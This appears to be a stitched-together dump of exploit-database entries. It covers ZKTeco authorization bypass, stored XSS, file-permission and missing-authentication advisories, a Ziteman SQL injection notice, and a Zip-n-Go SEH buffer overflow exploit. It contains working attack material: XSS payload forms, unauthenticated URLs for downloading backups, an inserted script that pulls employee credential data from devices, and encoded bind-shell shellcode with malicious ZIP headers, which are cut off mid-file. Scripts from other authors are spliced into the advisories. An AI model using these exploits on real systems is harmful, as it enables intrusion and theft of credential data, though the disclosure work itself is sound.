      <input type="hidden" name="un" value="1471451964349_2769" />
      <input type="hidden" name="systemCode" value="base" />
      <input type="submit" value="Go" />
    </form>
  </body>
</html>
            
ZKTeco ZKBioSecurity 3.0 (visLogin.jsp) Local Authorization Bypass


Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.0_R_230
                  Platform: 3.0.1.0_R_230
                  Personnel: 1.0.1.0_R_1916
                  Access: 6.0.1.0_R_1757
                  Elevator: 2.0.1.0_R_777
                  Visitor: 2.0.1.0_R_877
                  Video:2.0.1.0_R_489
                  Adms: 1.0.1.0_R_197

Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
platform developed by ZKTeco. It contains four integrated modules: access
control, video linkage, elevator control and visitor management. With an
optimized system architecture designed for high level biometric identification
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
solution for a whole new user experience.

Desc: The issue exists due to the way the visLogin.jsp script processes the login
request via the 'EnvironmentUtil.getClientIp(request)' method. It checks
whether the request is coming from the local machine and sets the ip variable
to '127.0.0.1' if it equals 0:0:0:0:0:0:0:1. The ip variable is then used as the
username, with the password '123456', to authenticate and disclose sensitive
information and/or perform unauthorized actions.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Microsoft Windows 7 Professional SP1 (EN)
           Apache-Coyote/1.1
           Apache Tomcat/7.0.56


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5367
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5367.php


18.07.2016

--


C:\Program Files (x86)\BioSecurity\MainResource\tomcat\webapps\ROOT\visLogin.jsp:
---------------------------------------------------------------------------------

<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>
<%@page import="com.zk.common.util.EnvironmentUtil"%>
<%
String path = request.getContextPath();
String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";

String ip= EnvironmentUtil.getClientIp(request);
if("0:0:0:0:0:0:0:1".equals(ip))
{
    ip = "127.0.0.1";
}

%>
<jsp:include  page="login.jsp"/>
  <script type="text/javascript" src="/vis/js/jquery.cookie.js"></script>

  <script>
      function autoLogin()
      {
                $.cookie('backUrl', "visRegistrationAction!registrationTouch.action?type=touch", { expires: 1 });
                $.cookie('customerBackUrl', "visRegistrationAction!registrationTouch.action?type=touch", { expires: 1 });
        var ip = "<%=ip%>";
        $("#userLoginForm input[name='username']").val(ip);
        $("#userLoginForm input[name='password']").val("123456");
        $('#userLoginForm').submit();
      }
      window.onload=autoLogin;
</script>

---------------------------------------------------------------------------------
            
<!--

ZKTeco ZKAccess Security System 5.3.1 Stored XSS Vulnerability


Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 5.3.12252

Summary: ZKAccess Systems are built on flexible, open technology to provide
management, real-time monitoring, and control of your access control system-all
from a browser, with no additional software to install. Our secure Web-hosted
infrastructure and centralized online administration reduce your IT costs and
allow you to easily manage all of your access points in a single location. C3-100's
versatile design features take care of present and future needs with ease and
efficiency. It is one of the most rugged and reliable controllers on the market,
with a multitude of built-in features. The C3-100 can communicate at 38.4 Kbps
via RS-485 configuration or Ethernet TCP/IP networks. It can store up to 30,000
cardholders.

Desc: Input passed to the 'holiday_name' and 'memo' POST parameters is not properly
sanitised before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context of an affected
site.

Tested on: CherryPy/3.1.0beta3 WSGI Server
           Firmware: AC Ver 4.1.9 3893-07 Jan 6 2016
           Python 2.6


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5368
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5368.php


18.07.2016

-->


<html>
  <body>
    <form action="http://127.0.0.1/data/iaccess/AccHolidays/_new_/?_lock=1" method="POST">
      <input type="hidden" name="pk" value="None" />
      <input type="hidden" name="holiday&#95;name" value=""><script>alert&#40;1&#41;<&#47;script>" />
      <input type="hidden" name="holiday&#95;type" value="1" />
      <input type="hidden" name="start&#95;date" value="09&#47;13&#47;2016" />
      <input type="hidden" name="end&#95;date" value="10&#47;18&#47;2016" />
      <input type="hidden" name="loop&#95;by&#95;year" value="2" />
      <input type="hidden" name="memo" value="&quot;&gt;&lt;script&gt;alert&#40;2&#41;&lt;&#47;script&gt;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
            
ZKTeco ZKAccess Professional 3.5.3 Insecure File Permissions


Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.5.3 (Build 0005)

Summary: ZKAccess 3.5 is a desktop software which is suitable
for small and medium businesses application. Compatible with
all ZKAccess standalone reader controllers, the software can
simultaneously manage access control and generate attendance
report. The brand new flat GUI design and humanized structure
of new ZKAccess 3.5 will make your daily management more pleasant
and convenient.

Desc: ZKAccess suffers from an elevation of privileges vulnerability:
any authenticated user can replace the application's executable with a
binary of their choice. The vulnerability exists because the installation
directory grants the 'M' (Modify) right to the 'Authenticated Users' group.


Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Microsoft Windows 7 Professional SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5361
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5361.php


18.07.2016

--


C:\ZKTeco>icacls ZKAccess3.5
ZKAccess3.5 BUILTIN\Administrators:(I)(F)
            BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
            NT AUTHORITY\SYSTEM:(I)(F)
            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
            BUILTIN\Users:(I)(OI)(CI)(RX)
            NT AUTHORITY\Authenticated Users:(I)(M)
            NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)

Successfully processed 1 files; Failed processing 0 files
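The icacls listing above is the whole finding, so the check a practitioner wants is a way to spot the same condition on other installs: which ACEs grant a write-capable right to a group every low-privileged account belongs to. The script below is an added example, not part of the advisory; it parses icacls output (the sample is the listing quoted above, embedded verbatim) and, when given a path on a Windows host, runs icacls itself. The set of "low-privileged" principals and of "write" rights are my assumptions, not something the advisory defines.

```python
import re
import subprocess
import sys
from typing import Dict, List, Set

# Constructed sample: the icacls output quoted in the advisory above.
SAMPLE_ICACLS = r"""ZKAccess3.5 BUILTIN\Administrators:(I)(F)
            BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
            NT AUTHORITY\SYSTEM:(I)(F)
            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
            BUILTIN\Users:(I)(OI)(CI)(RX)
            NT AUTHORITY\Authenticated Users:(I)(M)
            NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)

Successfully processed 1 files; Failed processing 0 files
"""

# Assumption: groups that every interactive, low-privileged account is a member of.
LOW_PRIV = {"NT AUTHORITY\\Authenticated Users", "BUILTIN\\Users", "Everyone",
            "NT AUTHORITY\\INTERACTIVE"}
# Assumption: icacls rights that let the holder change a file's contents.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WDAC", "WO"}
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}
ACE_RE = re.compile(r"^(?P<who>.+?):(?P<flags>(?:\([A-Za-z,]+\))+)$")


def parse_icacls(output: str) -> List[Dict[str, object]]:
    """Turn `icacls <path>` output into a list of ACE dicts.

    icacls prints the path on the first line followed by the first ACE, and
    pads continuation lines with spaces.  A path containing spaces would make
    the first line ambiguous; this parser assumes a space-free path.
    """
    aces: List[Dict[str, object]] = []
    first = True
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if first:
            parts = line.split(None, 1)          # drop the leading path token
            line = parts[1] if len(parts) > 1 else ""
            first = False
        m = ACE_RE.match(line)
        if not m:
            continue
        tokens = re.findall(r"\(([^)]+)\)", m.group("flags"))
        rights: Set[str] = set()
        for tok in tokens:
            if tok not in INHERIT_FLAGS and tok != "DENY":
                rights.update(tok.split(","))     # e.g. "(RX,W)" -> {"RX", "W"}
        aces.append({
            "who": m.group("who"),
            "rights": rights,
            "deny": "DENY" in tokens,
            "inherited": "I" in tokens,
            "inherit_only": "IO" in tokens,       # applies to children, not the object itself
            "propagates": bool({"OI", "CI"} & set(tokens)),
        })
    return aces


def writable_by_low_priv(output: str) -> List[Dict[str, object]]:
    """ACEs granting a write-capable right to a low-privileged group: the advisory's finding."""
    return [a for a in parse_icacls(output)
            if a["who"] in LOW_PRIV and not a["deny"] and (a["rights"] & WRITE_RIGHTS)]


def check_path(path: str) -> List[Dict[str, object]]:
    """Run icacls on a live Windows host (assumes icacls.exe is on PATH)."""
    out = subprocess.run(["icacls", path], capture_output=True, text=True, check=True).stdout
    return writable_by_low_priv(out)


if __name__ == "__main__":
    hits = check_path(sys.argv[1]) if len(sys.argv) > 1 else writable_by_low_priv(SAMPLE_ICACLS)
    for ace in hits:
        scope = "children only" if ace["inherit_only"] else "the object itself"
        print(f"{ace['who']}: {','.join(sorted(ace['rights']))} on {scope}")
```

On the advisory's listing this reports both Authenticated Users entries: the (I)(M) one on the directory itself and the (OI)(CI)(IO)(M) one that is inherited by every file created below it, which is what lets a normal user overwrite the executable.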
            
# Exploit Title: ZKTeco ZEM/ZMM 8.88 - Missing Authentication
# Exploit Author: RedTeam Pentesting GmbH
# CVE: CVE-2022-42953
Advisory: Missing Authentication in ZKTeco ZEM/ZMM Web Interface

The ZKTeco time attendance device does not require authentication to use the
web interface, exposing the database of employees and their credentials.


Details
=======

Product: ZKTeco ZEM500-510-560-760, ZEM600-800, ZEM720, ZMM
Affected Versions: potentially versions below 8.88 (ZEM500-510-560-760, ZEM600-800, ZEM720) and 15.00 (ZMM200-220-210)
Fixed Versions: firmware version 8.88 (ZEM500-510-560-760, ZEM600-800, ZEM720), firmware version 15.00 (ZMM200-220-210)
Vulnerability Type: Missing Authentication
Security Risk: medium
Vendor URL: https://zkteco.eu/company/history
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-003
Advisory Status: published
CVE: CVE-2022-42953
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42953


Introduction
============

"Time attendance and workforce management is an integrated set of
processes that an institution uses to optimize the productivity of its
employees on the individual, departmental, and entity-wide levels.
ZKTeco has been at the forefront of time attendance solutions for the
last 30 years, integrating advanced biometric technologies with
innovative and versatile terminals." (from company website)


More Details
============


The ZKTeco ZEM/ZMM device allows to store a list of users and their credentials
which may be used to log into the device to prove the users' attendance. These
credentials can either be a PIN, a card for a variety of card readers, or a
fingerprint. The user list can be managed through the web interface.

When opening the web interface, for example on http://192.0.2.1/,
the web server of the device sends a Set-Cookie header for a cookie with
name and value similar to the following:

-----------------------------------------------------------------------
Set-Cookie: SessionID=1624553126; path=/;
-----------------------------------------------------------------------

It was determined that the value of the cookie is roughly the number of
seconds since January 1, 1970. Since the value has a constant offset,
that might allow attackers to guess the cookie value. After setting the
cookie, the webserver redirects the browser to "/csl/login". The login
form provided at this URL has its form action set to "/csl/check". If
the user provides wrong credentials, the web server responds with an
error message. If the user provides correct credentials, the server
responds with a frameset.

In this frameset various options are available, for example a user list.
The list contains a link titled "Options" for each user item which
references a URL similar to the following

http://192.0.2.1/csl/user?did=0&uid=123

Additionally, backups of all settings of the device can be downloaded
from the backup page. The request to do so looks similar to the
following:
-----------------------------------------------------------------------
POST /form/DataApp HTTP/1.1
Host: 192.0.2.1
User-Agent: Mozilla/5.0
Cookie: SessionID=1624553126
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
Origin: http://192.0.2.1
Referer: http://192.0.2.1/form/Device?act=11

style=1
-----------------------------------------------------------------------

When the value "1" is given for the field named "style", the web server
responds with the file "device.dat" (corresponding to the option "Backup
System Data" in the web interface), for all other values the server
responds with the file "data.dat" (corresponding to the option "Backup
User Data" in the web interface). Both files can not only be requested
using HTTP-POST, but also using HTTP-GET with the following URLs:

http://192.0.2.1/form/DataApp?style=1
http://192.0.2.1/form/DataApp?style=0

Both files are - even though it's not obvious from the filename -
compressed tar archives. They can be extracted in the following way:

-----------------------------------------------------------------------
$ mv data.dat data.tgz
$ tar xvzf data.tgz
rwxr-xr-x root/root      0 1970-01-01 01:08 mnt/mtdblock/group.dat
rwxr-xr-x root/root      0 1970-01-01 01:08 mnt/mtdblock/htimezone.dat
rwxr-xr-x root/root      0 1970-01-01 01:08 mnt/mtdblock/lockgroup.dat
rwxrwxrwx 500/513    10512 2021-06-23 07:23 mnt/mtdblock/ssruser.dat
rwxr-xr-x root/root 819896 2021-06-18 07:23 mnt/mtdblock/tempinfo.dat
rwxrwxrwx 500/513    19456 2005-05-05 07:05 mnt/mtdblock/template.dat
rw-r--r-- root/root 360448 2021-06-18 07:23 mnt/mtdblock/templatev10.dat
rwxr-xr-x root/root      0 1970-01-01 01:08 mnt/mtdblock/timezone.dat
rwxrwxrwx 500/513     1372 2005-05-05 07:25 mnt/mtdblock/user.dat
rwxr-xr-x root/root    120 1970-01-01 01:08 mnt/mtdblock/data/alarm.dat
rwxr-xr-x root/root      0 2021-06-23 09:55 mnt/mtdblock/data/extlog.dat
rwxr-xr-x root/root      0 2013-05-04 01:28 mnt/mtdblock/data/extuser.dat
rwxr-xr-x root/root      0 1970-01-01 01:08 mnt/mtdblock/data/group.dat
rwxr-xr-x root/root      0 1970-01-01 01:08 mnt/mtdblock/data/htimezone.dat
rwxr-xr-x root/root      0 1970-01-01 01:08 mnt/mtdblock/data/lockgroup.dat
rwxr-xr-x root/root  54800 2021-06-23 09:55 mnt/mtdblock/data/oplog.dat
rwxr-xr-x root/root  33200 2021-06-23 07:23 mnt/mtdblock/data/sms.dat
rwxr-xr-x root/root      0 2021-06-23 09:55 mnt/mtdblock/data/ssrattlog.dat
rwxr-xr-x root/root    660 2018-11-09 17:28 mnt/mtdblock/data/stkey.dat
rwxrwxrwx 500/513        0 2013-05-04 01:28 mnt/mtdblock/data/template.dat
rwxr-xr-x root/root      0 1970-01-01 01:08 mnt/mtdblock/data/timezone.dat
rwxr-xr-x root/root      0 1970-01-01 01:08 mnt/mtdblock/data/transaction.dat
rwxr-xr-x root/root    952 2021-06-23 07:24 mnt/mtdblock/data/udata.dat
rwxr-xr-x root/root      0 1970-01-01 01:08 mnt/mtdblock/data/user.dat
rwxr-xr-x root/root      0 2013-05-04 01:28 mnt/mtdblock/data/wkcd.dat
-----------------------------------------------------------------------

In this archive, the file "mnt/mtdblock/templatev10.dat" will likely
contain fingerprints, and the file "mnt/mtdblock/ssruser.dat" contains
the user database. The user database contains 72 byte user records, each
containing the privilege level, the PIN, the name of the user, data
stored on external authentication tokens like cards, and the group of
the user.

While the cookie value might be guessable, it is not used for
authentication purposes. An attacker with knowledge of the
corresponding URLs could access the user detail view or the backup
without any authentication.


Proof of Concept
================

http://192.0.2.1/form/DataApp?style=1
http://192.0.2.1/form/DataApp?style=0
http://192.0.2.1/csl/user?did=0&uid=123
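The advisory describes the full chain: an unauthenticated GET to /form/DataApp returns a .dat file that is really a gzip'd tar, and the member mnt/mtdblock/ssruser.dat holds 72-byte user records. The script below is an added example (not RedTeam's code) that automates that check: it downloads the backup without sending any cookie, confirms the gzip/tar container, and counts the user records. The record-field offsets are not given in the advisory, so the script counts records only and does not decode them. The sample archive is constructed in-memory so the inspection logic runs offline.

```python
import io
import sys
import tarfile
import urllib.request
from typing import Dict, List, Optional

USER_RECORD_SIZE = 72                 # the advisory: ssruser.dat holds 72-byte user records
USER_DB = "mnt/mtdblock/ssruser.dat"
TEMPLATES = "mnt/mtdblock/templatev10.dat"


def fetch_backup(base_url: str, style: int, timeout: float = 10.0) -> bytes:
    """GET /form/DataApp?style=<n> with no Cookie header at all.

    style=1 returns device.dat ("Backup System Data"), any other value data.dat
    ("Backup User Data").  A device that answers with a tarball here is vulnerable.
    """
    url = f"{base_url.rstrip('/')}/form/DataApp?style={style}"
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read()


def inspect_backup(blob: bytes) -> Dict[str, object]:
    """Summarise a downloaded .dat: is it a gzip'd tar, and which sensitive members does it hold?"""
    members: List[str] = []
    user_records: Optional[int] = None
    has_templates = False
    is_gzip_tar = False
    if blob[:2] == b"\x1f\x8b":                      # gzip magic despite the .dat name
        try:
            with tarfile.open(fileobj=io.BytesIO(blob), mode="r:gz") as tar:
                for member in tar.getmembers():
                    members.append(member.name)
                    if not member.isfile():
                        continue
                    if member.name.endswith(USER_DB):
                        data = tar.extractfile(member).read()
                        user_records = len(data) // USER_RECORD_SIZE
                    elif member.name.endswith(TEMPLATES) and member.size > 0:
                        has_templates = True
            is_gzip_tar = True
        except tarfile.TarError:
            is_gzip_tar = False
    return {"is_gzip_tar": is_gzip_tar, "members": members,
            "user_records": user_records, "has_templates": has_templates}


def is_vulnerable(base_url: str) -> bool:
    """True when the user-data backup is served to a client that never authenticated."""
    return bool(inspect_backup(fetch_backup(base_url, style=0))["is_gzip_tar"])


def build_sample_backup(num_users: int = 2) -> bytes:
    """Constructed stand-in for data.dat with the member names seen in the advisory's listing."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        def add(name: str, payload: bytes) -> None:
            info = tarfile.TarInfo(name)
            info.size = len(payload)
            tar.addfile(info, io.BytesIO(payload))
        add(USER_DB, b"\x00" * (USER_RECORD_SIZE * num_users))
        add(TEMPLATES, b"\x00" * 16)
        add("mnt/mtdblock/data/oplog.dat", b"")
    return buf.getvalue()


if __name__ == "__main__":
    if len(sys.argv) > 1:
        blob = fetch_backup(sys.argv[1], style=0)        # e.g. http://192.0.2.1
    else:
        blob = build_sample_backup()                     # offline demo on constructed data
    summary = inspect_backup(blob)
    print("gzip'd tar:", summary["is_gzip_tar"])
    print("user records in ssruser.dat:", summary["user_records"])
    print("fingerprint templates present:", summary["has_templates"])
```

Run it as `python check_zem.py http://192.0.2.1` against a device on a network you are authorised to test; a non-vulnerable firmware should answer with a login page or an error rather than a gzip stream, which is what the magic-byte check keys on.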


Workaround
==========

Network access to the device should be limited to trustworthy persons.
This might be hard to implement if the device is installed in a public
space, especially if it is used for access control, too.


Fix
===

The vendor has released fixed firmware: version 8.88 for the ZEM500-510-560-760,
ZEM600-800 and ZEM720 models and version 15.00 for the ZMM200-220-210 models
(see "Fixed Versions" above). Devices running older firmware should be updated.


Security Risk
=============

Attackers with network access to a ZKTeco ZEM/ZMM time attendance device
can get access to employee data, including the credentials used for
accessing the time attendance device. If these credentials are used for
other purposes than time attendance, such as physical access control,
attackers might use them to gain access to protected areas. The actual
risk estimate varies wildly with the kind of access control system in
place and whether network access to the device is prevented by other
means, such as nearby security guards. For this reason, missing
authentication to the ZEM/ZMM web interface is estimated to pose a medium
risk. This estimate might need to be adjusted to the specific use case
of the device.


Timeline
========

2021-06-24 Vulnerability identified
2021-07-12 Customer approved disclosure to vendor
2021-07-16 Vendor notified
2021-08-20 Vendor provides fixed firmware
2022-09-29 Customer approved release of advisory
2022-10-10 CVE ID requested
2022-10-15 CVE ID assigned
2022-10-24 Advisory published


References
==========

https://zkteco.eu/company/history


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/


-- 
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
Alter Posthof 1                           Fax : +49 241 510081-99
52062 Aachen                    https://www.redteam-pentesting.de
Germany                         Registergericht: Aachen HRB 14004
Geschäftsführer:                       Patrick Hof, Jens Liebchen
            
source: https://www.securityfocus.com/bid/62949/info

Ziteman CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/admincss/default.asp 
            
#!/usr/bin/python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title      : Zip-n-Go v4.9 - Local Buffer Overflow (SEH)                                         #
# Exploit Author     : Hashim Jawad - @ihack4falafel                                                       #
# Vendor Homepage    : http://mc1soft.com/index.shtml                                                      #
# Vulnerable Software: http://mc1soft.com/files/zip-n-go49old.exe                                          #
# Tested on          : Windows 7 Enterprise - SP1 (x86)                                                    #
#----------------------------------------------------------------------------------------------------------#

# Disclosure Timeline:
# ====================
# 05-28-18: Contacted vendor, no response 
# 05-30-18: Contacted vendor again, responded with patch and requested further testing
# 05-30-18: Patch did not seem to fix the problem and alternative approach were suggested
# 05-31-18: Vendor applied new patch and requested further testing
# 05-31-18: The new patch nullified the vulnerability
# 06-03-18: Version 4.95 was released  
# 06-03-18: Proof of concept exploit published

#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -e x86/alpha_mixed BufferRegister=EAX -f python -v shellcode
#Payload size: 710 bytes
shellcode =  ""
shellcode += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
shellcode += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
shellcode += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
shellcode += "\x42\x75\x4a\x49\x39\x6c\x5a\x48\x6e\x62\x43\x30"
shellcode += "\x45\x50\x73\x30\x61\x70\x6d\x59\x7a\x45\x46\x51"
shellcode += "\x39\x50\x72\x44\x4e\x6b\x52\x70\x30\x30\x6c\x4b"
shellcode += "\x52\x72\x56\x6c\x6c\x4b\x73\x62\x37\x64\x4c\x4b"
shellcode += "\x32\x52\x51\x38\x54\x4f\x6f\x47\x31\x5a\x61\x36"
shellcode += "\x50\x31\x79\x6f\x4c\x6c\x35\x6c\x31\x71\x51\x6c"
shellcode += "\x47\x72\x46\x4c\x71\x30\x59\x51\x5a\x6f\x44\x4d"
shellcode += "\x56\x61\x6b\x77\x38\x62\x69\x62\x72\x72\x43\x67"
shellcode += "\x6e\x6b\x43\x62\x32\x30\x6c\x4b\x33\x7a\x55\x6c"
shellcode += "\x6c\x4b\x32\x6c\x34\x51\x34\x38\x6d\x33\x37\x38"
shellcode += "\x57\x71\x4a\x71\x66\x31\x6c\x4b\x42\x79\x51\x30"
shellcode += "\x65\x51\x59\x43\x4c\x4b\x52\x69\x45\x48\x6b\x53"
shellcode += "\x77\x4a\x47\x39\x4e\x6b\x76\x54\x4e\x6b\x46\x61"
shellcode += "\x58\x56\x36\x51\x59\x6f\x6e\x4c\x49\x51\x4a\x6f"
shellcode += "\x76\x6d\x35\x51\x68\x47\x57\x48\x49\x70\x62\x55"
shellcode += "\x48\x76\x56\x63\x31\x6d\x4a\x58\x55\x6b\x73\x4d"
shellcode += "\x35\x74\x33\x45\x4b\x54\x52\x78\x6c\x4b\x46\x38"
shellcode += "\x51\x34\x56\x61\x59\x43\x33\x56\x6c\x4b\x76\x6c"
shellcode += "\x50\x4b\x4e\x6b\x46\x38\x75\x4c\x67\x71\x68\x53"
shellcode += "\x6c\x4b\x34\x44\x4e\x6b\x47\x71\x78\x50\x4b\x39"
shellcode += "\x47\x34\x57\x54\x55\x74\x33\x6b\x33\x6b\x55\x31"
shellcode += "\x31\x49\x50\x5a\x42\x71\x4b\x4f\x4b\x50\x31\x4f"
shellcode += "\x31\x4f\x72\x7a\x4c\x4b\x54\x52\x6a\x4b\x6c\x4d"
shellcode += "\x31\x4d\x62\x48\x46\x53\x50\x32\x77\x70\x43\x30"
shellcode += "\x72\x48\x70\x77\x30\x73\x35\x62\x43\x6f\x50\x54"
shellcode += "\x70\x68\x72\x6c\x71\x67\x67\x56\x47\x77\x49\x6f"
shellcode += "\x68\x55\x6e\x58\x4c\x50\x43\x31\x45\x50\x53\x30"
shellcode += "\x46\x49\x78\x44\x33\x64\x62\x70\x50\x68\x76\x49"
shellcode += "\x4f\x70\x42\x4b\x43\x30\x69\x6f\x69\x45\x73\x5a"
shellcode += "\x67\x78\x31\x49\x42\x70\x6a\x42\x59\x6d\x71\x50"
shellcode += "\x32\x70\x73\x70\x36\x30\x70\x68\x78\x6a\x36\x6f"
shellcode += "\x69\x4f\x6d\x30\x6b\x4f\x69\x45\x4f\x67\x63\x58"
shellcode += "\x47\x72\x47\x70\x36\x71\x31\x4c\x6c\x49\x59\x76"
shellcode += "\x70\x6a\x74\x50\x31\x46\x61\x47\x45\x38\x4f\x32"
shellcode += "\x69\x4b\x54\x77\x35\x37\x79\x6f\x6a\x75\x66\x37"
shellcode += "\x51\x78\x4d\x67\x39\x79\x37\x48\x59\x6f\x39\x6f"
shellcode += "\x6a\x75\x62\x77\x61\x78\x43\x44\x68\x6c\x37\x4b"
shellcode += "\x68\x61\x69\x6f\x4a\x75\x70\x57\x5a\x37\x52\x48"
shellcode += "\x74\x35\x32\x4e\x52\x6d\x45\x31\x39\x6f\x4a\x75"
shellcode += "\x71\x78\x71\x73\x30\x6d\x32\x44\x65\x50\x4f\x79"
shellcode += "\x69\x73\x36\x37\x32\x77\x36\x37\x70\x31\x7a\x56"
shellcode += "\x51\x7a\x56\x72\x53\x69\x36\x36\x7a\x42\x49\x6d"
shellcode += "\x43\x56\x78\x47\x33\x74\x31\x34\x37\x4c\x67\x71"
shellcode += "\x46\x61\x6e\x6d\x53\x74\x34\x64\x62\x30\x6a\x66"
shellcode += "\x65\x50\x71\x54\x66\x34\x52\x70\x72\x76\x36\x36"
shellcode += "\x32\x76\x31\x56\x70\x56\x30\x4e\x53\x66\x52\x76"
shellcode += "\x31\x43\x32\x76\x52\x48\x64\x39\x38\x4c\x65\x6f"
shellcode += "\x4f\x76\x49\x6f\x78\x55\x4b\x39\x49\x70\x50\x4e"
shellcode += "\x53\x66\x31\x56\x79\x6f\x34\x70\x50\x68\x65\x58"
shellcode += "\x4e\x67\x57\x6d\x63\x50\x79\x6f\x38\x55\x4d\x6b"
shellcode += "\x68\x70\x78\x35\x6d\x72\x62\x76\x72\x48\x6d\x76"
shellcode += "\x4d\x45\x6f\x4d\x4f\x6d\x39\x6f\x4b\x65\x37\x4c"
shellcode += "\x77\x76\x71\x6c\x46\x6a\x6f\x70\x39\x6b\x4d\x30"
shellcode += "\x74\x35\x33\x35\x6f\x4b\x61\x57\x77\x63\x52\x52"
shellcode += "\x50\x6f\x32\x4a\x73\x30\x32\x73\x6b\x4f\x78\x55"
shellcode += "\x41\x41"

####################### ZIP File Structure ######################## 
###################################################################
######################## Local File Header ########################
LocalFileHeader  = '\x50\x4b\x03\x04' # local file header signature
LocalFileHeader += '\x14\x00'         # version needed to extract 0x14 = 20 -> 2.0
LocalFileHeader += '\x00\x00'         # general purpose bit flag
LocalFileHeader += '\x00\x00'         # compression method
LocalFileHeader += '\xb7\xac'         # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23
LocalFileHeader += '\xce\x34'         # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3
LocalFileHeader += '\x00\x00\x00'     # CRC-32 '\x00' was left out to make sure we hit 25 bytes before file length
LocalFileHeader += '\x00\x00\x00\x00' # compressed size
LocalFileHeader += '\x00\x00\x00\x00' # uncompressed size
LocalFileHeader += '\xe4\x0f'         # file name length 0x0fe4 = 4068 bytes 
LocalFileHeader += '\x00\x00'         # extra field length
LocalFileHeader += '\x00'             # file name
#LocalFileHeader += '\x00'             # extra field
################## Central Directory File Header ##################
CDFileHeader     = '\x50\x4b\x01\x02' # cd file header signature 
CDFileHeader    += '\x14\x00'         # version made by 0x14 = 20 -> 2.0
CDFileHeader    += '\x14\x00'         # version needed to extract 0x14 = 20 -> 2.0
CDFileHeader    += '\x00\x00'         # general purpose bit flag
CDFileHeader    += '\x00\x00'         # compression method 
CDFileHeader    += '\xb7\xac'         # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23
CDFileHeader    += '\xce\x34'         # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3
CDFileHeader    += '\x00\x00\x00\x00' # CRC-32
CDFileHeader    += '\x00\x00\x00\x00' # compressed size
CDFileHeader    += '\x00\x00\x00\x00' # uncompressed size
CDFileHeader    += '\xe4\x0f'         # file name length 0x0fe4 = 4068 bytes
CDFileHeader    += '\x00\x00'         # extra field length
CDFileHeader    += '\x00\x00'         # file comment length 
CDFileHeader    += '\x00\x00'         # disk number where file starts
CDFileHeader    += '\x01\x00'         # internal file attributes BIT 0: apparent ASCII/text file
CDFileHeader    += '\x24\x00\x00\x00' # external file attributes 
CDFileHeader    += '\x00\x00\x00\x00' # relative offset of local file header
#CDFileHeader    += '\x00'             # file name
#CDFileHeader    += '\x00'             # extra field 
#CDFileHeader    += '\x00'             # file comment 
################ End of Central Directory Record ##################
EOCDRHeader      = '\x50\x4b\x05\x06' # End of central directory signature
EOCDRHeader     += '\x00\x00'         # number of this disk 
EOCDRHeader     += '\x00\x00'         # disk where central directory starts 
